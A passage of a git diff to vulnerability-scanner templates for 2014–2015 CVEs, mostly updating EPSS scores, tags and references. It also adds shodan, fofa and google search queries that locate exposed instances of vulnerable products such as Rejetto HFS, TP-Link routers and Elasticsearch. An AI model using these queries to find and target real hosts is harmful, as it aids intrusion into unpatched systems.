cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,katz - flow: http(1) && http(2) http: diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml index 41d512b06b..8095b8dbc9 100644 --- a/http/cves/2014/CVE-2014-4539.yaml +++ b/http/cves/2014/CVE-2014-4539.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-4539 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.47838 + epss-percentile: 0.48718 cpe: cpe:2.3:a:movies_project:movies:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -28,7 +28,6 @@ info: product: movies framework: wordpress tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,movies_project - flow: http(1) && http(2) http: diff --git a/http/cves/2014/CVE-2014-4558.yaml b/http/cves/2014/CVE-2014-4558.yaml index f87981322e..2bb3fb697b 100644 --- a/http/cves/2014/CVE-2014-4558.yaml +++ b/http/cves/2014/CVE-2014-4558.yaml @@ -13,13 +13,14 @@ info: - https://wpscan.com/vulnerability/37d7936a-165f-4c37-84a6-7ba5b59a0301 - https://nvd.nist.gov/vuln/detail/CVE-2014-4558 - http://codevigilant.com/disclosure/wp-plugin-swipehq-payment-gateway-woocommerce-a3-cross-site-scripting-xss + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2014-4558 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48556 + epss-percentile: 0.48718 cpe: cpe:2.3:a:cybercompany:swipehq-payment-gateway-woocommerce:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -27,7 +28,6 @@ info: product: swipehq-payment-gateway-woocommerce framework: wordpress tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,woocommerce,unauth,cybercompany - flow: http(1) && http(2) http: diff --git a/http/cves/2014/CVE-2014-4561.yaml b/http/cves/2014/CVE-2014-4561.yaml index b1e5187f18..fb2bf85812 100644 --- a/http/cves/2014/CVE-2014-4561.yaml +++ b/http/cves/2014/CVE-2014-4561.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-4561 cwe-id: CWE-79 epss-score: 0.00098 - epss-percentile: 0.40364 + epss-percentile: 0.40792 cpe: cpe:2.3:a:ultimate-weather_project:ultimate-weather:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -28,7 +28,6 @@ info: product: ultimate-weather framework: wordpress tags: cve2014,cve,wordpress,wp-plugin,xss,weather,wpscan,unauth,ultimate-weather_project - flow: http(1) && http(2) http: diff --git a/http/cves/2014/CVE-2014-4940.yaml b/http/cves/2014/CVE-2014-4940.yaml index 90fe1a1ae5..fca10862e5 100644 --- a/http/cves/2014/CVE-2014-4940.yaml +++ b/http/cves/2014/CVE-2014-4940.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5 cve-id: CVE-2014-4940 cwe-id: CWE-22 - epss-score: 0.03212 - epss-percentile: 0.90985 + epss-score: 0.05292 + epss-percentile: 0.93046 cpe: cpe:2.3:a:tera_charts_plugin_project:tera-charts:0.1:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-5258.yaml b/http/cves/2014/CVE-2014-5258.yaml index 8df99e4d08..2e873e82b5 100644 --- a/http/cves/2014/CVE-2014-5258.yaml +++ b/http/cves/2014/CVE-2014-5258.yaml @@ -27,6 +27,7 @@ info: max-request: 1 vendor: webedition product: webedition_cms + shodan-query: cpe:"cpe:2.3:a:webedition:webedition_cms" tags: cve2014,cve,edb,packetstorm,lfi,webedition http: diff --git a/http/cves/2014/CVE-2014-6271.yaml b/http/cves/2014/CVE-2014-6271.yaml index b1bdf04366..ee93326360 100644 --- a/http/cves/2014/CVE-2014-6271.yaml +++ b/http/cves/2014/CVE-2014-6271.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2014-6271 cwe-id: CWE-78 epss-score: 0.97559 - epss-percentile: 0.99997 + epss-percentile: 0.99998 cpe: cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:* metadata: max-request: 8 diff --git a/http/cves/2014/CVE-2014-6287.yaml b/http/cves/2014/CVE-2014-6287.yaml index 5b7d648f67..cc28a0a534 100644 --- a/http/cves/2014/CVE-2014-6287.yaml +++ b/http/cves/2014/CVE-2014-6287.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: 'CVE-2014-6287' cwe-id: CWE-94 - epss-score: 0.97289 - epss-percentile: 0.99851 + epss-score: 0.97341 + epss-percentile: 0.99889 cpe: cpe:2.3:a:rejetto:http_file_server:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: rejetto product: http_file_server shodan-query: http.favicon.hash:2124459909 + fofa-query: icon_hash=2124459909 tags: cve2014,cve,packetstorm,msf,hfs,rce,kev,rejetto variables: str1: '{{rand_base(6)}}' diff --git a/http/cves/2014/CVE-2014-8676.yaml b/http/cves/2014/CVE-2014-8676.yaml index 2eb92670c9..59abfcf55b 100644 --- a/http/cves/2014/CVE-2014-8676.yaml +++ b/http/cves/2014/CVE-2014-8676.yaml @@ -28,6 +28,8 @@ info: max-request: 1 vendor: soplanning product: soplanning + shodan-query: http.html:"soplanning" + fofa-query: body="soplanning" tags: cve2014,cve,packetstorm,edb,seclists,soplanning,lfi,xss http: diff --git a/http/cves/2014/CVE-2014-8682.yaml b/http/cves/2014/CVE-2014-8682.yaml index 321ab2db3e..5f3cab51ff 100644 --- a/http/cves/2014/CVE-2014-8682.yaml +++ b/http/cves/2014/CVE-2014-8682.yaml @@ -29,6 +29,8 @@ info: vendor: gogits product: gogs shodan-query: title:"Sign In - Gogs" + google-query: intitle:"sign in - gogs" + fofa-query: title="sign in - gogs" tags: cve2014,cve,gogs,seclists,packetstorm,edb,sqli,gogits http: diff --git a/http/cves/2014/CVE-2014-8799.yaml b/http/cves/2014/CVE-2014-8799.yaml index dd9b9f18af..bf6ac7e08f 100644 --- a/http/cves/2014/CVE-2014-8799.yaml +++ b/http/cves/2014/CVE-2014-8799.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2014-8799 cwe-id: CWE-22 epss-score: 0.17844 - epss-percentile: 0.96039 + epss-percentile: 0.9615 cpe: cpe:2.3:a:dukapress:dukapress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9180.yaml b/http/cves/2014/CVE-2014-9180.yaml index faf2b9414d..d6341be61d 100644 --- a/http/cves/2014/CVE-2014-9180.yaml +++ b/http/cves/2014/CVE-2014-9180.yaml @@ -16,8 +16,8 @@ info: cvss-score: 5 cve-id: CVE-2014-9180 cwe-id: CWE-601 - epss-score: 0.00285 - epss-percentile: 0.6809 + epss-score: 0.00214 + epss-percentile: 0.59443 cpe: cpe:2.3:a:eleanor-cms:eleanor_cms:-:*:*:*:*:*:*:* metadata: verified: true @@ -25,6 +25,7 @@ info: vendor: eleanor-cms product: eleanor_cms shodan-query: html:"eleanor" + fofa-query: body="eleanor" tags: cve2014,cve,packetstorm,eleanor,cms,redirect,eleanor-cms http: diff --git a/http/cves/2014/CVE-2014-9444.yaml b/http/cves/2014/CVE-2014-9444.yaml index 4e01a22313..cfbe7037c3 100644 --- a/http/cves/2014/CVE-2014-9444.yaml +++ b/http/cves/2014/CVE-2014-9444.yaml @@ -13,13 +13,14 @@ info: - https://wpscan.com/vulnerability/f0739b1e-22dc-4ca6-ad83-a0e80228e3c7 - https://nvd.nist.gov/vuln/detail/CVE-2014-9444 - http://packetstormsecurity.com/files/129749/WordPress-Frontend-Uploader-0.9.2-Cross-Site-Scripting.html + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2014-9444 cwe-id: CWE-79 - epss-score: 0.00287 - epss-percentile: 0.65501 + epss-score: 0.00619 + epss-percentile: 0.78788 cpe: cpe:2.3:a:frontend_uploader_project:frontend_uploader:0.9.2:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9606.yaml b/http/cves/2014/CVE-2014-9606.yaml index 20225da1f4..e044328774 100644 --- a/http/cves/2014/CVE-2014-9606.yaml +++ b/http/cves/2014/CVE-2014-9606.yaml @@ -13,13 +13,14 @@ info: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9606 - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2014-9606 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.41261 + epss-percentile: 0.41716 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9607.yaml b/http/cves/2014/CVE-2014-9607.yaml index e00d43f46f..144c8dfc93 100644 --- a/http/cves/2014/CVE-2014-9607.yaml +++ b/http/cves/2014/CVE-2014-9607.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-9607 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.40591 + epss-percentile: 0.41716 cpe: cpe:2.3:a:netsweeper:netsweeper:4.0.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9608.yaml b/http/cves/2014/CVE-2014-9608.yaml index 5561db4d36..a894613804 100644 --- a/http/cves/2014/CVE-2014-9608.yaml +++ b/http/cves/2014/CVE-2014-9608.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2014-9608 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.40591 + epss-percentile: 0.41716 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9614.yaml b/http/cves/2014/CVE-2014-9614.yaml index 48e1769a8f..56a54e3022 100644 --- a/http/cves/2014/CVE-2014-9614.yaml +++ b/http/cves/2014/CVE-2014-9614.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-9614 cwe-id: CWE-798 epss-score: 0.01433 - epss-percentile: 0.85223 + epss-percentile: 0.8655 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9617.yaml b/http/cves/2014/CVE-2014-9617.yaml index 2be4ac953e..cecf244e49 100644 --- a/http/cves/2014/CVE-2014-9617.yaml +++ b/http/cves/2014/CVE-2014-9617.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-9617 cwe-id: CWE-601 epss-score: 0.00109 - epss-percentile: 0.43869 + epss-percentile: 0.44022 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9618.yaml b/http/cves/2014/CVE-2014-9618.yaml index ccc915382c..478b7858c2 100644 --- a/http/cves/2014/CVE-2014-9618.yaml +++ b/http/cves/2014/CVE-2014-9618.yaml @@ -15,13 +15,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2014-9618 - https://www.exploit-db.com/exploits/37933/ - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2014-9618 cwe-id: CWE-287 epss-score: 0.03433 - epss-percentile: 0.90527 + epss-percentile: 0.91476 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-1000005.yaml b/http/cves/2015/CVE-2015-1000005.yaml index 99fd990224..e127593c5c 100644 --- a/http/cves/2015/CVE-2015-1000005.yaml +++ b/http/cves/2015/CVE-2015-1000005.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2015-1000005 cwe-id: CWE-22 - epss-score: 0.047 - epss-percentile: 0.92455 + epss-score: 0.05258 + epss-percentile: 0.93027 cpe: cpe:2.3:a:candidate-application-form_project:candidate-application-form:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-1427.yaml b/http/cves/2015/CVE-2015-1427.yaml index 444756f589..de0b9ca407 100644 --- a/http/cves/2015/CVE-2015-1427.yaml +++ b/http/cves/2015/CVE-2015-1427.yaml @@ -20,13 +20,14 @@ info: cvss-score: 7.5 cve-id: CVE-2015-1427 cwe-id: CWE-284 - epss-score: 0.85974 - epss-percentile: 0.98485 + epss-score: 0.87385 + epss-percentile: 0.98629 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: elasticsearch product: elasticsearch + fofa-query: index_not_found_exception tags: cve2015,cve,packetstorm,elastic,rce,elasticsearch,kev http: diff --git a/http/cves/2015/CVE-2015-1503.yaml b/http/cves/2015/CVE-2015-1503.yaml index 611ec88318..966f3227db 100644 --- a/http/cves/2015/CVE-2015-1503.yaml +++ b/http/cves/2015/CVE-2015-1503.yaml @@ -28,6 +28,8 @@ info: vendor: icewarp product: mail_server shodan-query: title:"icewarp" + fofa-query: title="icewarp server administration" + google-query: intitle:"icewarp server administration" tags: cve2015,cve,lfi,mail,packetstorm,icewarp http: diff --git a/http/cves/2015/CVE-2015-1579.yaml b/http/cves/2015/CVE-2015-1579.yaml index 8b1cbf521f..62de6b57dd 100644 --- a/http/cves/2015/CVE-2015-1579.yaml +++ b/http/cves/2015/CVE-2015-1579.yaml @@ -21,8 +21,8 @@ info: cvss-score: 5 cve-id: CVE-2015-1579 cwe-id: CWE-22 - epss-score: 0.90145 - epss-percentile: 0.9855 + epss-score: 0.82302 + epss-percentile: 0.98398 cpe: cpe:2.3:a:elegant_themes:divi:-:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2015/CVE-2015-1635.yaml b/http/cves/2015/CVE-2015-1635.yaml index 4398251cff..0251c0c926 100644 --- a/http/cves/2015/CVE-2015-1635.yaml +++ b/http/cves/2015/CVE-2015-1635.yaml @@ -17,8 +17,8 @@ info: cvss-score: 10 cve-id: CVE-2015-1635 cwe-id: CWE-94 - epss-score: 0.97537 - epss-percentile: 0.99992 + epss-score: 0.9754 + epss-percentile: 0.99994 cpe: cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-1880.yaml b/http/cves/2015/CVE-2015-1880.yaml index da134bc3b4..237ab86213 100644 --- a/http/cves/2015/CVE-2015-1880.yaml +++ b/http/cves/2015/CVE-2015-1880.yaml @@ -27,6 +27,8 @@ info: max-request: 1 vendor: fortinet product: fortios + shodan-query: http.html:"/remote/login" "xxxxxxxx" + fofa-query: body="/remote/login" "xxxxxxxx" tags: cve2015,cve,xss,fortigates,intrusive,fortinet http: diff --git a/http/cves/2015/CVE-2015-2068.yaml b/http/cves/2015/CVE-2015-2068.yaml index db07a3904a..07927481dd 100644 --- a/http/cves/2015/CVE-2015-2068.yaml +++ b/http/cves/2015/CVE-2015-2068.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-2068 cwe-id: CWE-79 epss-score: 0.00146 - epss-percentile: 0.4958 + epss-percentile: 0.50455 cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-2080.yaml b/http/cves/2015/CVE-2015-2080.yaml index affbf5e835..cee184fae4 100644 --- a/http/cves/2015/CVE-2015-2080.yaml +++ b/http/cves/2015/CVE-2015-2080.yaml @@ -18,13 +18,14 @@ info: cvss-score: 7.5 cve-id: CVE-2015-2080 cwe-id: CWE-200 - epss-score: 0.95465 - epss-percentile: 0.99329 + epss-score: 0.95345 + epss-percentile: 0.99356 cpe: cpe:2.3:o:fedoraproject:fedora:22:*:*:*:*:*:*:* metadata: max-request: 1 vendor: fedoraproject product: fedora + shodan-query: cpe:"cpe:2.3:o:fedoraproject:fedora" tags: cve2015,cve,jetty,packetstorm,fedoraproject http: diff --git a/http/cves/2015/CVE-2015-2166.yaml b/http/cves/2015/CVE-2015-2166.yaml index 045252b92f..7c88c23a6d 100644 --- a/http/cves/2015/CVE-2015-2166.yaml +++ b/http/cves/2015/CVE-2015-2166.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5 cve-id: CVE-2015-2166 cwe-id: CWE-22 - epss-score: 0.23272 - epss-percentile: 0.96445 + epss-score: 0.29639 + epss-percentile: 0.96917 cpe: cpe:2.3:a:ericsson:drutt_mobile_service_delivery_platform:4.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-2196.yaml b/http/cves/2015/CVE-2015-2196.yaml index 2e0903f253..34b19334ff 100644 --- a/http/cves/2015/CVE-2015-2196.yaml +++ b/http/cves/2015/CVE-2015-2196.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2015-2196 cwe-id: CWE-89 - epss-score: 0.0025 - epss-percentile: 0.6433 + epss-score: 0.00253 + epss-percentile: 0.65124 cpe: cpe:2.3:a:web-dorado:spider_calendar:1.4.9:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-2755.yaml b/http/cves/2015/CVE-2015-2755.yaml index 1c126b301d..4172f02203 100644 --- a/http/cves/2015/CVE-2015-2755.yaml +++ b/http/cves/2015/CVE-2015-2755.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2015-2755 cwe-id: CWE-352 epss-score: 0.01828 - epss-percentile: 0.87952 + epss-percentile: 0.88216 cpe: cpe:2.3:a:ab_google_map_travel_project:ab_google_map_travel:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -30,7 +30,7 @@ info: vendor: ab_google_map_travel_project product: ab_google_map_travel framework: wordpress - tags: cve,cve2015,xss,wordpress,wp-plugin,wp,ab-map,authenticated,ab_google_map_travel_project + tags: packetstorm,cve,cve2015,xss,wordpress,wp-plugin,wp,ab-map,authenticated,ab_google_map_travel_project http: - raw: diff --git a/http/cves/2015/CVE-2015-2807.yaml b/http/cves/2015/CVE-2015-2807.yaml index 7f5783fa83..e106537f6f 100644 --- a/http/cves/2015/CVE-2015-2807.yaml +++ b/http/cves/2015/CVE-2015-2807.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-2807 cwe-id: CWE-79 epss-score: 0.00294 - epss-percentile: 0.68624 + epss-percentile: 0.69186 cpe: cpe:2.3:a:documentcloud:navis_documentcloud:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -30,7 +30,6 @@ info: framework: wordpress google-query: inurl:"/wp-content/plugins/navis-documentcloud" tags: cve2015,cve,wordpress,wp-plugin,xss,documentcloud - flow: http(1) && http(2) http: diff --git a/http/cves/2015/CVE-2015-2996.yaml b/http/cves/2015/CVE-2015-2996.yaml index 56ac0bbd61..6477f07092 100644 --- a/http/cves/2015/CVE-2015-2996.yaml +++ b/http/cves/2015/CVE-2015-2996.yaml @@ -29,6 +29,7 @@ info: vendor: sysaid product: sysaid shodan-query: http.favicon.hash:1540720428 + fofa-query: icon_hash=1540720428 tags: cve2015,cve,sysaid,lfi,seclists http: diff --git a/http/cves/2015/CVE-2015-3035.yaml b/http/cves/2015/CVE-2015-3035.yaml index 534a9216db..4540b128f8 100644 --- a/http/cves/2015/CVE-2015-3035.yaml +++ b/http/cves/2015/CVE-2015-3035.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2015-3035 cwe-id: CWE-22 epss-score: 0.58993 - epss-percentile: 0.97444 + epss-percentile: 0.97743 cpe: cpe:2.3:o:tp-link:tl-wr841n_\(9.0\)_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: tp-link product: tl-wr841n_\(9.0\)_firmware shodan-query: http.title:"TP-LINK" + fofa-query: title="tp-link" + google-query: intitle:"tp-link" tags: cve2015,cve,router,lfi,seclists,tplink,kev,tp-link http: diff --git a/http/cves/2015/CVE-2015-3224.yaml b/http/cves/2015/CVE-2015-3224.yaml index df6b263f83..117fdd6353 100644 --- a/http/cves/2015/CVE-2015-3224.yaml +++ b/http/cves/2015/CVE-2015-3224.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-3224 cwe-id: CWE-284 epss-score: 0.92904 - epss-percentile: 0.98975 + epss-percentile: 0.99025 cpe: cpe:2.3:a:rubyonrails:web_console:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-3337.yaml b/http/cves/2015/CVE-2015-3337.yaml index 2f802b7da9..e6e73bdd4f 100644 --- a/http/cves/2015/CVE-2015-3337.yaml +++ b/http/cves/2015/CVE-2015-3337.yaml @@ -20,13 +20,14 @@ info: cvss-score: 4.3 cve-id: CVE-2015-3337 cwe-id: CWE-22 - epss-score: 0.96447 - epss-percentile: 0.9948 + epss-score: 0.96187 + epss-percentile: 0.99512 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: elasticsearch product: elasticsearch + fofa-query: index_not_found_exception tags: cve2015,cve,packetstorm,edb,elastic,lfi,elasticsearch,plugin http: diff --git a/http/cves/2015/CVE-2015-4050.yaml b/http/cves/2015/CVE-2015-4050.yaml index dc67e6688d..75a3533dfb 100644 --- a/http/cves/2015/CVE-2015-4050.yaml +++ b/http/cves/2015/CVE-2015-4050.yaml @@ -21,12 +21,13 @@ info: cve-id: CVE-2015-4050 cwe-id: CWE-284 epss-score: 0.00598 - epss-percentile: 0.77957 + epss-percentile: 0.78364 cpe: cpe:2.3:a:sensiolabs:symfony:2.3.19:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sensiolabs product: symfony + shodan-query: cpe:"cpe:2.3:a:sensiolabs:symfony" tags: cve2015,cve,symfony,rce,sensiolabs http: diff --git a/http/cves/2015/CVE-2015-4062.yaml b/http/cves/2015/CVE-2015-4062.yaml index a3086ce3cd..f1e8b0ce01 100644 --- a/http/cves/2015/CVE-2015-4062.yaml +++ b/http/cves/2015/CVE-2015-4062.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.5 cve-id: CVE-2015-4062 cwe-id: CWE-89 - epss-score: 0.03919 - epss-percentile: 0.91099 + epss-score: 0.0272 + epss-percentile: 0.90505 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2015/CVE-2015-4074.yaml b/http/cves/2015/CVE-2015-4074.yaml index 7b9c50d4cb..3564b8856b 100644 --- a/http/cves/2015/CVE-2015-4074.yaml +++ b/http/cves/2015/CVE-2015-4074.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-4074 cwe-id: CWE-22 epss-score: 0.00598 - epss-percentile: 0.77961 + epss-percentile: 0.78367 cpe: cpe:2.3:a:helpdesk_pro_project:helpdesk_pro:*:*:*:*:*:joomla\!:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-4127.yaml b/http/cves/2015/CVE-2015-4127.yaml index d418678913..2b35be4787 100644 --- a/http/cves/2015/CVE-2015-4127.yaml +++ b/http/cves/2015/CVE-2015-4127.yaml @@ -15,13 +15,14 @@ info: - https://wpscan.com/vulnerability/2d5b3707-f58a-4154-93cb-93f7058e3408 - https://wordpress.org/plugins/church-admin/changelog/ - https://nvd.nist.gov/vuln/detail/CVE-2015-4127 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2015-4127 cwe-id: CWE-79 epss-score: 0.0034 - epss-percentile: 0.68397 + epss-percentile: 0.71383 cpe: cpe:2.3:a:church_admin_project:church_admin:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -29,7 +30,6 @@ info: product: church_admin framework: wordpress tags: cve2015,cve,wp-plugin,wp,edb,wpscan,wordpress,xss,church_admin_project - flow: http(1) && http(2) http: diff --git a/http/cves/2015/CVE-2015-4455.yaml b/http/cves/2015/CVE-2015-4455.yaml index 39485d2025..ea36b7cd0f 100644 --- a/http/cves/2015/CVE-2015-4455.yaml +++ b/http/cves/2015/CVE-2015-4455.yaml @@ -9,13 +9,14 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2015-4455 - http://packetstormsecurity.com/files/132256/WordPress-Aviary-Image-Editor-Add-On-For-Gravity-Forms-3.0-Beta-Shell-Upload.html + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2015-4455 cwe-id: CWE-434 - epss-score: 0.28491 - epss-percentile: 0.96807 + epss-score: 0.55856 + epss-percentile: 0.97673 cpe: cpe:2.3:a:aviary_image_editor_add-on_for_gravity_forms_project:aviary_image_editor_add-on_for_gravity_forms:*:beta:*:*:*:wordpress:*:* metadata: vendor: aviary_image_editor_add-on_for_gravity_forms_project diff --git a/http/cves/2015/CVE-2015-4632.yaml b/http/cves/2015/CVE-2015-4632.yaml index 736b7ef8af..9b15f9d743 100644 --- a/http/cves/2015/CVE-2015-4632.yaml +++ b/http/cves/2015/CVE-2015-4632.yaml @@ -27,6 +27,7 @@ info: max-request: 1 vendor: koha product: koha + shodan-query: cpe:"cpe:2.3:a:koha:koha" tags: cve2015,cve,lfi,edb,koha http: diff --git a/http/cves/2015/CVE-2015-4666.yaml b/http/cves/2015/CVE-2015-4666.yaml index 30e491e3ac..dcfea4e355 100644 --- a/http/cves/2015/CVE-2015-4666.yaml +++ b/http/cves/2015/CVE-2015-4666.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-4666 cwe-id: CWE-22 epss-score: 0.02372 - epss-percentile: 0.89592 + epss-percentile: 0.89823 cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-4668.yaml b/http/cves/2015/CVE-2015-4668.yaml index cb04dbfe5c..12ca3e511e 100644 --- a/http/cves/2015/CVE-2015-4668.yaml +++ b/http/cves/2015/CVE-2015-4668.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2015-4668 cwe-id: CWE-601 epss-score: 0.00397 - epss-percentile: 0.73024 + epss-percentile: 0.73425 cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-4694.yaml b/http/cves/2015/CVE-2015-4694.yaml index fff5f19692..13b7beca88 100644 --- a/http/cves/2015/CVE-2015-4694.yaml +++ b/http/cves/2015/CVE-2015-4694.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-4694 cwe-id: CWE-22 epss-score: 0.02304 - epss-percentile: 0.88593 + epss-percentile: 0.89683 cpe: cpe:2.3:a:zip_attachments_project:zip_attachments:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-5461.yaml b/http/cves/2015/CVE-2015-5461.yaml index 23b34974f9..cb35e3d581 100644 --- a/http/cves/2015/CVE-2015-5461.yaml +++ b/http/cves/2015/CVE-2015-5461.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-5461 cwe-id: NVD-CWE-Other epss-score: 0.0055 - epss-percentile: 0.77025 + epss-percentile: 0.77434 cpe: cpe:2.3:a:stageshow_project:stageshow:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-5471.yaml b/http/cves/2015/CVE-2015-5471.yaml index 039fd0a3d6..e4ec4623ba 100644 --- a/http/cves/2015/CVE-2015-5471.yaml +++ b/http/cves/2015/CVE-2015-5471.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.3 cve-id: CVE-2015-5471 cwe-id: CWE-22 - epss-score: 0.10406 - epss-percentile: 0.94855 + epss-score: 0.14014 + epss-percentile: 0.95676 cpe: cpe:2.3:a:swim_team_project:swim_team:1.44.10777:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-5531.yaml b/http/cves/2015/CVE-2015-5531.yaml index 0fcc460443..6490ab3b0e 100644 --- a/http/cves/2015/CVE-2015-5531.yaml +++ b/http/cves/2015/CVE-2015-5531.yaml @@ -21,12 +21,13 @@ info: cve-id: CVE-2015-5531 cwe-id: CWE-22 epss-score: 0.97144 - epss-percentile: 0.99783 + epss-percentile: 0.99802 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: elasticsearch product: elasticsearch + fofa-query: index_not_found_exception tags: cve2015,cve,vulhub,packetstorm,elasticsearch,intrusive http: diff --git a/http/cves/2015/CVE-2015-5688.yaml b/http/cves/2015/CVE-2015-5688.yaml index e6e306178d..4362111d4d 100644 --- a/http/cves/2015/CVE-2015-5688.yaml +++ b/http/cves/2015/CVE-2015-5688.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-5688 cwe-id: CWE-22 epss-score: 0.01347 - epss-percentile: 0.84665 + epss-percentile: 0.86101 cpe: cpe:2.3:a:geddyjs:geddy:13.0.7:*:*:*:*:node.js:*:* metadata: max-request: 1 diff 